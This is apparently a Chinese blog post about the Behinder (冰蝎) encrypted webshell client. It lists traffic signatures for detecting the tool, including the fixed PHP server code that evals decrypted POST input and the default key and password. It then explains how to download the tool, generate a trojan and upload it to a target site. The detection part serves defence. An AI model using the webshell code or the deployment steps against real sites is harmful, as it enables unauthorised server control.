冰蝎的原理与安装使用

冰蝎的原理与安装使用

1、冰蝎原理

1.1简介

复制代码
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。

1.2冰蝎的流量特征

分析冰蝎的流量特征有助于识别和理解该恶意软件的行为模式,从而提高网络安全防御水平。通过深入了解冰蝎的流量特征,可以识别其传播方式、通信机制和攻击模式,为网络管理员提供有效的检测和防御手段,帮助确保系统和数据的安全。

1.2.1 Accept字段
复制代码
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1.2.2 Content-Type
复制代码
Content-type: Application/x-www-form-urlencoded
这个也是冰蝎的固定格式,
1.2.3 冰蝎生成的服务端 webshell 中存在固定代码
复制代码
$post=Decrypt(file_get_contents("php://input"));
 eval($post);
1.2.4固定的请求头和响应头
复制代码
请求:
dFAXQV1LORcHRQtLRlwMAhwFTAg/M

响应:
TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd

请求头

响应头

1.2.5 连接密码

默认时,所有冰蝎4.0 webshell都有"e45e329feb5d925b" 一串密钥。该密钥为连接密码32位md5值的 前16位,默认连接密码rebeyond

2、冰蝎的使用

下载地址:链接:https://pan.baidu.com/s/1a0b2ibNtlRtFSeJrvtuN9A?pwd=yyds

提取码:yyds

2.1 点击运行

点击Behinder.jar文件即可运行(前提是要有java环境,自行下载安装,这里不赘述)

检查是否有java环境的方法

复制代码
cmd输入
java -version

2.2 生成木马

然后就会生成:

2.3 把木马文件上传到目标中

这个自行学习,可以通过目标网站访问shell.php文件就是上传成功

2.4点击新增

保存后双击即可进入。

3、成功连接

相关推荐
午夜游鱼1 小时前
Go 泛型实战:一行代码封装 sync.Pool,性能与安全兼得
开发语言·安全·golang
星梦清河1 小时前
宋红康 JVM 笔记 Day16|垃圾回收相关概念
java·jvm·笔记
誰能久伴不乏2 小时前
Modbus 速查与实战笔记(功能码、帧结构、坑点)
笔记
赵谨言2 小时前
基于数据挖掘的单纯冠心病与冠心病合并糖尿病的证治规律对比研究
经验分享·数据挖掘·毕业设计
赵谨言2 小时前
基于大数据挖掘的药品不良反应知识整合与利用研究
经验分享·数据挖掘·毕业设计
月阳羊2 小时前
【硬件-笔试面试题-81】硬件/电子工程师,笔试面试题(知识点:详细讲讲同步时钟与异步时钟通信)
java·经验分享·单片机·嵌入式硬件·面试
easy20202 小时前
从机器学习的角度实现 excel 中趋势线:揭秘梯度下降过程
笔记·机器学习·线性回归
半桔3 小时前
【Linux手册】信号量与建造者模式:以 PV 操作保证并发安全,分步组装构建复杂对象
linux·运维·安全·建造者模式
Hóng xīng qiáo3 小时前
swVBA自学笔记014、Lisp适合对SolidWorks进行二次开发吗 ?
开发语言·笔记·lisp
网络之路Blog3 小时前
【实战中提升自己完结篇】分支篇之分支之无线、内网安全与QOS部署(完结)
网络协议·安全·网络之路一天·华为华三数通基础·网络设备管理·华为华三二三层交换机对接